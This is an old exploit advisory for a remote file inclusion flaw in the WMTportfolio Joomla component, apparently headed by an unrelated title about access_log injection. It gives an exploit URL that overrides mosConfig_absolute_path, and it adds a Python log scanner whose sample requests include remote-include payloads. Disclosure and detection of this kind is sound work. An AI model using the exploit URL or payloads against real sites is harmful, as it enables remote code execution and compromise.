LFI to RCE via access_log injection

WMTportfolio Joomla Component 1.0 - RFI


[o] WMTportfolio Joomla Component 1.0 Remote File Include Vulnerability
Software : com_wmtportfolio version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_wmtportfolio/admin.wmtportfolio.php
include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );


[o] Exploit
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4497
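
[o] Detection (added example)
The following log check is an added example, not part of the original advisory or of the component's code. It flags access-log requests that supply mosConfig_absolute_path, a server-side configuration variable that no client request should carry; the sample log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

PARAM = "mosConfig_absolute_path"  # parameter named in the advisory
FILE = "/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php"
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)

# Constructed sample lines (Apache combined format), not taken from a real server.
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {FILE}?mosConfig_absolute_path=http://host.example/x.txt? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /path/index.php?option=com_wmtportfolio&Itemid=3 HTTP/1.1" 200 8411 "-" "-"',
    f'192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET {FILE}?mosConfig%5Fabsolute%5Fpath=ftp%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 512 "-" "-"',
    f'192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "POST {FILE}?mosConfig.absolute.path=/tmp HTTP/1.1" 200 512 "-" "-"',
]


def php_name(key):
    """Normalise a query key as PHP does: '.' and ' ' become '_', '[...]' is dropped."""
    return key.split("[", 1)[0].replace(".", "_").replace(" ", "_")


def scan(lines):
    """Return (client_ip, kind, value) for each request that supplies PARAM."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        query = m.group("target").partition("?")[2]
        # parse_qsl percent-decodes keys and values, so encoded variants are caught
        for key, value in parse_qsl(query, keep_blank_values=True):
            if php_name(key) == PARAM:
                kind = "remote-include" if SCHEME.match(value) else "path-override"
                hits.append((m.group("ip"), kind, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Access logs record only the request line, so the same parameter sent in a POST body or a cookie will not appear in this scan.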

